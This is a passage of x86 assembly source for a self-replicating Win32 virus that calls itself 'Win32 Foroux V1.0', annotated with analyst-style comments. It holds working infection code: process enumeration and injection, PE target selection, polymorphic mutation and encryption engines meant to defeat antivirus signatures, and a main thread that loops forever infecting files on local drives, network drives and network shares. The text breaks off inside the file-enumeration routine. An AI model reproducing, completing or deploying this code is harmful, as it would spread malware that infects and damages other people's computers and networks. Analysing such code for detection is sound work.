;-----------------------------------------------------------------------
; enum_proc -- entry point of the process-infection pass.
; Self-relocating: ebp is derived from the call/pop pair below and every
; variable is addressed as [ebp+var-enum_proc_ip]. snap_proc and into_proc
; reuse that ebp (their *_ip labels are equ'd to enum_proc_ip).
; In:    none (reads the addrCreateToolhelp32Snapshot slot, resolved elsewhere)
; Out:   none; all registers preserved by pushad/popad
; Analyst note: when the Toolhelp API address is zero the code falls back
; to trying PIDs 4,8,...,80000 blindly, one OpenProcess per candidate
; (see into_proc) -- a burst of ~20000 OpenProcess calls is the visible
; symptom of that path.
;-----------------------------------------------------------------------
enum_proc:
pushad
call enum_proc_ip
enum_proc_ip:
pop ebp ;ebp = run-time address of enum_proc_ip (delta base)
mov ecx,[ebp+addrCreateToolhelp32Snapshot-enum_proc_ip]
jecxz short enum_proc_0 ;API not resolved: brute-force PIDs instead
SUBCALL snap_proc,enum_proc_ip
jmp short enum_proc_ret
enum_proc_0:
xor eax,eax ;eax = candidate PID; bumped before first use
mov ecx,20000 ;20000 candidates, step 4 -> PIDs 4..80000
enum_proc_1:
add eax,4 ;step of 4 (presumably because NT PIDs are multiples of 4)
;eax = PID in; into_proc keeps eax/ecx intact (pushad/popad)
SUBCALL into_proc,snap_proc_ip
loop enum_proc_1
enum_proc_ret:
popad
retn
enum_proc_end:
;-----------------------------------------------------------------------
; snap_proc -- walk the Toolhelp process list and hand each PID to into_proc.
; In:    ebp -> enum_proc_ip (snap_proc_ip equ enum_proc_ip)
;        [ebp+is9x] non-zero on Windows 9x
; Out:   none; registers preserved by pushad/popad
; Uses:  [ebp+snapbuf] as the PROCESSENTRY32 buffer (dwSize written as 296)
; Calls: CreateToolhelp32Snapshot, Process32First/Next, CloseHandle, str_instr
; Stack: the snapshot handle is pushed right after CreateToolhelp32Snapshot
;        and stays on the stack until CloseHandle consumes it at snap_proc_2.
; On 9x only an entry whose szExeFile matches '\explorer' is passed on;
; on NT every entry in the snapshot is.
;-----------------------------------------------------------------------
CALLHEADER snap_proc
snap_proc:
snap_proc_ip equ enum_proc_ip
pushad
push large 0 ;th32ProcessID (ignored for a process snapshot)
push large 2 ;TH32CS_SNAPPROCESS
call [ebp+addrCreateToolhelp32Snapshot-snap_proc_ip]
or eax,eax
jz snap_proc_ret ;snapshot failed: nothing to walk, nothing to close
push eax ;snapshot handle; doubles as the CloseHandle argument
lea edi,[ebp+snapbuf-snap_proc_ip] ;edi -> PROCESSENTRY32
mov dword ptr [edi],296 ;dwSize (= sizeof PROCESSENTRY32, 32-bit ANSI)
push edi
push eax
call [ebp+addrProcess32First-snap_proc_ip]
snap_proc_1:
or eax,eax
jz snap_proc_2 ;FALSE: end of list or error -> close the snapshot
mov ecx,[ebp+is9x-snap_proc_ip]
jecxz snap_proc_3 ;NT: no name filter
push edi ;keep the entry pointer across the string search
lea ebx,[edi+9*4] ;->szExeFile
call snap_proc_4 ;pushes the address of the literal below
db '\explorer',0
snap_proc_4:
pop edi ;edi -> '\explorer'
;str_instr reports through ZF; per the jnz below, ZF set = found
SUBCALL str_instr,snap_proc_ip
pop edi ;edi -> PROCESSENTRY32 again
jnz short snap_proc_5 ;If is Win9X,only explorer to infect
snap_proc_3:
mov eax,[edi+2*4] ;th32ProcessID
SUBCALL into_proc,snap_proc_ip
snap_proc_5:
pop eax ;snapshot handle
push eax ;put it back for CloseHandle later
push edi
push eax
call [ebp+addrProcess32Next-snap_proc_ip]
jmp snap_proc_1
snap_proc_2:
call [ebp+addrCloseHandle-snap_proc_ip] ;argument = the handle pushed above
snap_proc_ret:
popad
retn
snap_proc_end:
;-----------------------------------------------------------------------
; into_proc -- open one process by PID and hand it to inf_proc.
; In:    ebp -> enum_proc_ip (into_proc_ip equ enum_proc_ip), eax = PID
; Out:   none; registers preserved by pushad/popad
; Calls: OpenProcess(0fffh, FALSE, PID), inf_proc, CloseHandle
; 0fffh is the pre-Vista PROCESS_ALL_ACCESS mask; asking for it on every
; PID is the part of this routine a monitor would see. inf_proc is given
; edi = process handle and ebx = 400000h, i.e. the target's image base is
; assumed rather than queried (whether inf_proc verifies it is not in view).
;-----------------------------------------------------------------------
CALLHEADER into_proc
into_proc:
into_proc_ip equ enum_proc_ip
pushad
push eax ;dwProcessId
push large 0 ;bInheritHandle = FALSE
push large 0fffh ;dwDesiredAccess = PROCESS_ALL_ACCESS (pre-Vista value)
call [ebp+addrOpenProcess-into_proc_ip]
or eax,eax
jz short into_proc_2 ;no handle (denied / no such PID): skip silently
push eax ;handle; becomes the CloseHandle argument below
xchg eax,edi ;edi = process handle, presumably inf_proc's input
mov ebx,400000h ;assumed image base of the target
SUBCALL inf_proc,into_proc_ip
call [ebp+addrCloseHandle-enum_proc_ip]
into_proc_2:
popad
retn
into_proc_end:
;-----------------------------------------------------------------------
; check_pe -- decide whether the image at ebx is an acceptable PE.
; In:    ebx -> image base (assumed readable; e_lfanew is not bounds-checked)
; Out:   ZF clear = acceptable, ZF set = rejected
;        eax -> IMAGE_NT_HEADERS (only meaningful once the 'MZ' test passed)
; Clobbers: eax, flags. ebx and ecx are preserved.
; Accepts only: 'MZ' and 'PE' signatures, not IMAGE_FILE_DLL, and
; Subsystem 2 or 3 (GUI or console; the and 0feh folds 3 onto 2).
; 'ZM'/'EP' are the word-sized little-endian forms of "MZ"/"PE".
;-----------------------------------------------------------------------
CALLHEADER check_pe
check_pe:
push ecx
xor ecx,ecx ;ecx = 0 ("invalid") until every test passes
cmp word ptr [ebx],'ZM' ;IMAGE_DOS_SIGNATURE
jnz short check_pe_ret
mov eax,[ebx+3ch] ;e_lfanew
add eax,ebx ;eax -> IMAGE_NT_HEADERS
cmp word ptr [eax],'EP' ;low word of IMAGE_NT_SIGNATURE
jnz short check_pe_ret
test byte ptr [eax+16h+1],20h ;Is a DLL? FileHeader.Characteristics & IMAGE_FILE_DLL
jnz short check_pe_ret
push ebx
mov bl,[eax+5ch] ;Subsystem (low byte of OptionalHeader.Subsystem)
and bl,0feh ;2 or 3 -> 2
cmp bl,2
pop ebx
jnz short check_pe_ret
inc ecx ;all tests passed
check_pe_ret:
or ecx,ecx ;ZF = (ecx == 0); the pop below leaves flags alone
pop ecx
retn
check_pe_end:
;-----------------------------------------------------------------------
; get_section_of_rva -- find the section header whose virtual range
; contains a given RVA.
; In:    eax -> IMAGE_NT_HEADERS (as check_pe leaves it), edi = RVA to find
; Out:   ZF clear = found, edx -> that header's VirtualSize field
;        ZF set = not found, edx -> VirtualSize of the last header
;        (or of the slot before the first header when NumberOfSections is 0)
; Clobbers: edx, esi, flags. ecx is preserved.
; The range test uses VirtualSize, not SizeOfRawData, so an RVA that falls
; in raw-data padding beyond VirtualSize is reported as not found.
;-----------------------------------------------------------------------
CALLHEADER get_section_of_rva
get_section_of_rva:
push ecx
movzx edx,word ptr [eax+14h] ;FileHeader.SizeOfOptionalHeader
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize (28h = size of one section header)
movzx ecx,word ptr [eax+6] ;FileHeader.NumberOfSections
inc ecx ;+1 so the pre-decrement below runs NumberOfSections times
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2 ;every header examined: not found, ecx == 0
add edx,28h ;->VirtualSize of the next header
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress? (unsigned compare)
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi;VirtualAddress+VirtualSize<=RVA -> keep looking
jna short get_section_of_rva_1
get_section_of_rva_2:
or ecx,ecx ;ZF = not found
pop ecx
retn
get_section_of_rva_end:
;-----------------------------------------------------------------------
; prepare_buffer -- build the copy of the body that is written into targets:
; mutate the live body in place (poly_* routines), copy vir_size bytes from
; _start to infbuffer, then encrypt two regions of the copy with fresh keys.
; In:    none (ebp derived locally)
; Out:   [ebp+infbuffer] holds the mutated, partly encrypted copy;
;        registers preserved by pushad/popad
; Calls: poly_start, poly_callsub, poly_blk_encrypt, poly_blk_encrypt_poly,
;        get_rand (value appears in dx), blk_encrypt (esi -> region; the key
;        word is stored at [esi-4] just before each call -- presumably read
;        from there by blk_encrypt, which is not in view)
; Analyst note: the keys are random per generation, so the bytes of the
; prepare_buffer and main_thread regions differ in every copy; only code
; that runs before decryption is stable across samples.
;-----------------------------------------------------------------------
CALLHEADER prepare_buffer
prepare_buffer:
pushad
call pre_buf_ip
pre_buf_ip:
pop ebp
;Mutate the running body first so the copy below already carries the changes
SUBCALL poly_start,pre_buf_ip
SUBCALL poly_callsub,pre_buf_ip
SUBCALL poly_blk_encrypt,pre_buf_ip
SUBCALL poly_blk_encrypt_poly,pre_buf_ip
lea esi,[ebp+_start-pre_buf_ip] ;source: the running body
lea edi,[ebp+infbuffer-pre_buf_ip] ;destination: staging buffer
mov ecx,vir_size
cld
push edi ;keep the infbuffer address across the copy and get_rand
rep movsb
SUBCALL get_rand,pre_buf_ip
pop edi ;edi -> infbuffer
;Region 1: prepare_buffer inside the copy; key word stored 4 bytes before it
lea esi,[edi+prepare_buffer-_start]
mov word ptr [esi-4],dx
call blk_encrypt
xchg dh,dl ;second key = byte-swapped first key
;Region 2: main_thread inside the copy
lea esi,[edi+main_thread-_start]
mov word ptr [esi-4],dx
call blk_encrypt
popad
retn
prepare_buffer_end:
;-----------------------------------------------------------------------
; poly_callsub -- polymorphic rewrite of the 16 bytes at _callsub.
; In:    none (ebp derived locally; random bits come back from get_rand in dl)
; Out:   [ebp+_callsub] .. +16 rewritten in the live body; registers preserved
; Two independent bits (dl&1, dl&2) each choose one of two byte patterns
; for an 8-byte instruction group; both patterns embed the displacement to
; blk_encrypt, which is why the constants are built from blk_encrypt-call_sub_1.
; The patterns are presumably functionally equivalent (blk_encrypt and
; call_sub_1 are not in view). Net effect for signatures: four possible
; byte forms at _callsub across samples.
;-----------------------------------------------------------------------
CALLHEADER poly_callsub
poly_callsub:
pushad
call poly_callsub_ip
poly_callsub_ip:
pop ebp
SUBCALL get_rand,poly_callsub_ip
lea edi,[ebp+_callsub-poly_callsub_ip] ;edi -> patch site in the live body
;Group 1 (8 bytes at +0): default pattern, replaced when dl&1
mov dword ptr [edi],000000e8h+(blk_encrypt-call_sub_1)*100h
mov dword ptr [edi+4],0fc76ff00h
test dl,1
jz short poly_callsub_1
mov dword ptr [edi],0e8fc76ffh
mov dword ptr [edi+4],00000000h+(blk_encrypt-call_sub_1-3)
poly_callsub_1:
;Group 2 (8 bytes at +8): default pattern, replaced when dl&2
mov dword ptr [edi+8],0fc46c766h
mov dword ptr [edi+8+4],0ff560000h
test dl,2
jz short poly_callsub_2
mov dword ptr [edi+8],046c76656h
mov dword ptr [edi+8+4],0ff0000fch
poly_callsub_2:
popad
retn
poly_callsub_end:
;-----------------------------------------------------------------------
; poly_blk_encrypt -- polymorphic rewrite of the head of blk_encrypt.
; In:    dl = random bits (edx from the caller's get_rand)
; Out:   bytes of blk_encrypt rewritten in place; registers preserved
; NOTE: this routine uses edi, not ebp, as its delta register. The labels
; poly_blk_encrypt_@1/@2/@3 are patch points consumed by
; poly_blk_encrypt_poly, which rewrites register fields inside THIS routine;
; the literal values written below are therefore not constant across
; samples, and inserting or moving an instruction here breaks those offsets.
; dl&1: swap the bytes at blk_encrypt+0 and +1
; dl&2: select which 16-bit word is stored at blk_encrypt+2
; dl&4: select which dword is stored at blk_encrypt+blk_encrypt_@1
;-----------------------------------------------------------------------
CALLHEADER poly_blk_encrypt
poly_blk_encrypt:
pushad
call poly_blk_encrypt_ip
poly_blk_encrypt_ip:
pop edi
add edi,blk_encrypt-poly_blk_encrypt_ip ;edi -> blk_encrypt (delta applied)
test dl,1
jz short poly_blk_encrypt_1
;three-instruction swap of [edi] and [edi+1]; @1 marks its first byte
poly_blk_encrypt_@1 equ $
mov bl,[edi]
xchg bl,[edi+1]
xchg bl,[edi]
poly_blk_encrypt_1:
;@2 = opcode byte of the mov below (patched by poly_blk_encrypt_poly)
poly_blk_encrypt_@2 equ $+1
mov bx,5f56h
mov word ptr [edi+2],bx
test dl,2
jz short poly_blk_encrypt_2
;@3 = opcode byte of the alternative mov (also patched)
poly_blk_encrypt_@3 equ $+1
mov bx,0fe8bh
mov word ptr [edi+2],bx
poly_blk_encrypt_2:
mov dword ptr [edi+blk_encrypt_@1],0f59006ah
test dl,4
jz short poly_blk_encrypt_3
mov dword ptr [edi+blk_encrypt_@1],0f90c933h
poly_blk_encrypt_3:
;poly_blk_encrypt_4 is an unused alias of poly_blk_encrypt_3
poly_blk_encrypt_4:
popad
retn
poly_blk_encrypt_end:
;-----------------------------------------------------------------------
; poly_blk_encrypt_poly -- second-level mutation: decrypt poly_blk_encrypt,
; randomise the register fields of the instructions it contains, re-encrypt.
; In:    none. (The older ";in--edi" note was stale: edi is recomputed from
;        ebp at the lea below before its first use.)
; Out:   poly_blk_encrypt mutated and re-encrypted in place; registers preserved
; Calls: blk_decrypt / blk_encrypt (esi -> region), get_rand (random in edx)
; Masks: 0c7h clears a ModRM reg field (bits 3..5); 0f8h clears the
; register number in the low 3 bits of an opcode byte. A 2-bit random
; value is OR'ed in, so only registers 0..3 are ever selected, and the
; same value goes into every byte of one instruction group so the group
; stays self-consistent.
;-----------------------------------------------------------------------
CALLHEADER poly_blk_encrypt_poly
poly_blk_encrypt_poly:
pushad
call poly_blk_encrypt_poly_ip
poly_blk_encrypt_poly_ip:
pop ebp
lea edi,[ebp+poly_blk_encrypt-poly_blk_encrypt_poly_ip] ;edi -> poly_blk_encrypt (live)
mov esi,edi
call blk_decrypt ;make it patchable
SUBCALL get_rand,poly_blk_encrypt_poly_ip
and dl,3h ;only take four common reg,eax,ebx,ecx,edx
mov al,dl
shl al,3 ;al = reg<<3, ModRM reg-field position
;Same register into the three ModRM bytes of the swap sequence at @1
and byte ptr [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],al
;@2 group: register number into the opcode byte, same register into the
;ModRM reg field of the store 5 bytes later
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@2-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@2-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],al
;@3 group: fresh random, same two patch positions
SUBCALL get_rand,poly_blk_encrypt_poly_ip
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@3-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@3-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],al
mov esi,edi
call blk_encrypt ;put poly_blk_encrypt back under encryption
popad
retn
poly_blk_encrypt_poly_end:
;-----------------------------------------------------------------------
; poly_start -- polymorphic rewrite of the entry stub (_start_@1..@3 and
; main_enter) in the live body.
; In:    none (ebp derived locally; random value from get_rand in edx)
; Out:   those bytes rewritten; registers preserved by pushad/popad
; dl&1    : swap the two dwords at _start_@1 and _start_@2
; dl&3    : register number written into _start_@3+3 (mask 0f8h) and, shifted,
;           into the ModRM reg field at _start_@3+1 (mask 0c7h)
; dh&018h : a reg-field value written into main_enter+1 and main_enter+4
; bit 24  : picks one of two opcode bytes (89h / 87h) at main_enter+3
; Every offset here assumes the exact byte layout of the patched
; instructions; the _start_@n labels are patch points, not code labels.
;-----------------------------------------------------------------------
CALLHEADER poly_start
poly_start:
pushad
call poly_start_ip
poly_start_ip:
pop ebp
SUBCALL get_rand,poly_start_ip
test dl,1
jz short poly_start_1
;swap the dwords at _start_@1 and _start_@2 via eax
mov eax,[ebp+_start_@1-poly_start_ip]
xchg eax,[ebp+_start_@2-poly_start_ip]
xchg eax,[ebp+_start_@1-poly_start_ip]
poly_start_1:
lea esi,[ebp+_start_@3+1-poly_start_ip] ;esi -> _start_@3+1
and dl,3 ;register number 0..3
and byte ptr [esi+2],0f8h ;low 3 bits = register number
or [esi+2],dl
shl dl,3 ;same register at ModRM reg-field position
and byte ptr [esi],0c7h
or [esi],dl
and dh,018h ;independent choice, already in reg-field position
add esi,main_enter-_start_@3 ;esi->main_enter+1
and byte ptr [esi],0c7h
or [esi],dh
add esi,3 ;esi -> main_enter+4
and byte ptr [esi],0c7h
or [esi],dh
rol edx,8 ;dl = bits 24..31 of the random: a bit not used above
dec esi ;esi->main_enter+3 (NOT main_enter: +1, +3, -1), the opcode byte of the second patched instruction
mov byte ptr [esi],89h ;default opcode byte
test dl,1
jz short poly_start_2
mov byte ptr [esi],87h ;alternative opcode byte
poly_start_2:
popad
retn
poly_start_end:
;*******************************infproc.asm end*****************************
;*******************************mainthrd.asm*****************************
;include mainthrd.asm
;-----------------------------------------------------------------------
; main_thread -- the resident worker. Never returns: one pass infects
; processes, the host module's directory tree, fixed/remote drives and the
; network, then sleeps 20 minutes in 20-second slices (re-running the
; process pass each slice) and starts over at infect_all_driver.
; In:    none (ebp derived locally)
; Uses:  MAX_DIR_SIZE bytes of stack as the path buffer (never released),
;        [ebp+is9x], goto_enum_proc_pretime, quick_sleep, have_a_sleep_pretime
; Calls: get_extra_proc, prepare_buffer, GetVersion, GetTickCount,
;        goto_enum_proc, GetModuleFileNameA, find_str_tail, enum_path,
;        get_rand, GetDriveTypeA, enum_net, Sleep
; Behavioural indicators: Sleep(20000) in runs of 60, GetDriveTypeA over
; consecutive drive letters, and the literal 'Win32 Foroux V1.0' below.
;-----------------------------------------------------------------------
CALLHEADER main_thread
main_thread:
call main_thread_ip
main_thread_ip:
pop ebp
if DEBUG
OUTSTRING 'I go in'
endif
SUBCALL get_extra_proc,main_thread_ip
SUBCALL prepare_buffer,main_thread_ip
call [ebp+addrGetVersion-main_thread_ip]
shr eax,31 ;MSB=1 means is Win9X
mov [ebp+is9x-main_thread_ip],eax
sub esp,MAX_DIR_SIZE ;path buffer; never popped -- the thread loops forever
cld
xor eax,eax
mov [ebp+goto_enum_proc_pretime-main_thread_ip],eax
mov [ebp+quick_sleep-main_thread_ip],eax
call [ebp+addrGetTickCount-main_thread_ip]
mov [ebp+have_a_sleep_pretime-main_thread_ip],eax
call goto_enum_proc
;Infect module path
mov edi,esp ;edi -> path buffer
push large MAX_DIR_SIZE ;nSize
push edi ;lpFilename
push large 0 ;hModule = NULL: the host executable's own path
call [ebp+addrGetModuleFileNameA-main_thread_ip]
call find_str_tail ;presumably leaves edi at the end of the string
std
mov cl,0ffh ;only cl is set; ecx's upper bytes are whatever the API left
mov al,'\'
repnz scasb ;scan backwards to the last '\'
cld
mov byte ptr [edi+1],0 ;truncate after that '\' -> the host's directory
call enum_path
;Infect all drives
infect_all_driver:
SUBCALL get_rand,main_thread_ip
and dl,3
add dl,'c' ;first try C:~F: (random starting letter)
mov [esp],dl
mov word ptr [esp+1],':' ;buffer is now "X:" + NUL
push large ((INFECT_LASTDISK-INFECT_FIRSTDISK) and 0ffh)+1
pop ecx ;ecx = number of drive letters to try
infect_disk_loop:
mov edi,ecx ;edi carries the loop count across the calls
push esp ;lpRootPathName -> "X:"
call [ebp+addrGetDriveTypeA-main_thread_ip]
cmp al,3 ;DRIVE_FIXED
jc short next_disk
cmp al,4 ;DRIVE_REMOTE
ja short next_disk ;only types 3..4 (fixed, network) are walked
call enum_path
next_disk:
mov al,[esp]
inc al ;next letter, wrapping LASTDISK -> FIRSTDISK
cmp al,INFECT_LASTDISK and 0ffh
jbe short next_disk_1
mov al,INFECT_FIRSTDISK and 0ffh
next_disk_1:
mov [esp],al
mov ecx,edi
loop infect_disk_loop
;Infect through net
infect_net:
xor eax,eax
call enum_net
;Sleep 20 minutes: 60 rounds of (process pass + Sleep 20 s)
push large 60
pop edi
main_thread_wait:
call goto_enum_proc
push large 20*1000 ;dwMilliseconds
call [ebp+addrSleep-main_thread_ip]
dec edi
jnz short main_thread_wait
jmp short infect_all_driver ;loop forever; no ret on any path
;Marker string carried in the body (usable as a static indicator)
db 'Win32 Foroux V1.0'
;stack map
;esp->find file handle
;esp+4->WIN32_FIND_DATA
;esp+4+8*4+size WIN32_FIND_DATA->return address
;esp+4+8*4+size WIN32_FIND_DATA+4->find path
enum_path:
enum_path_ip equ main_thread_ip
pushad
lea esi,[esp+4+4*8]
call copy_path
call find_str_tail
if DEBUG
mov eax,'*.1\'
else
mov eax,'*.*\'
endif
stosd
xor eax,eax
stosd
sub esp,size WIN32_FIND_DATA
lea esi,[ebp+pathname_buf-enum_path_ip]
push esp
push esi
call [ebp+addrFindFirstFileA-enum_path_ip]
inc eax
jz enum_path_ok
dec eax
push eax ;handle of find file
found_one_file:
test dword ptr [esp+4+0],FILE_ATTRIBUTE_OFFLINE or FILE_ATTRIBUTE_REPARSE_POINT or FILE_ATTRIBUTE_SPARSE_FILE or FILE_ATTRIBUTE_TEMPORARY ;dwFileAttributes
jnz enum_next_file_jmp1
lea esi,[esp+4+size WIN32_FIND_DATA+4+4*8]
call copy_path
push edi
call find_str_tail
mov ecx,MAX_PATH
mov al,'\'
stosb
lea esi,[esp+4+4+2ch] ;cFileName
mov eax,[esi]
rep movsb
pop esi
;Check whether the file name is '.' or '..'
not eax
test eax,00002e2eh ;is '..'?
jz short enum_next_file_jmpz
test ax,002eh ;is '.'?
jz short enum_next_file_jmp1
test dword ptr [esp+4+0],FILE_ATTRIBUTE_DIRECTORY
jz short enum_do_fop
;Avoid go into Temporary Internet Files directory,
;because there are too many html files which can't be infected,we must save time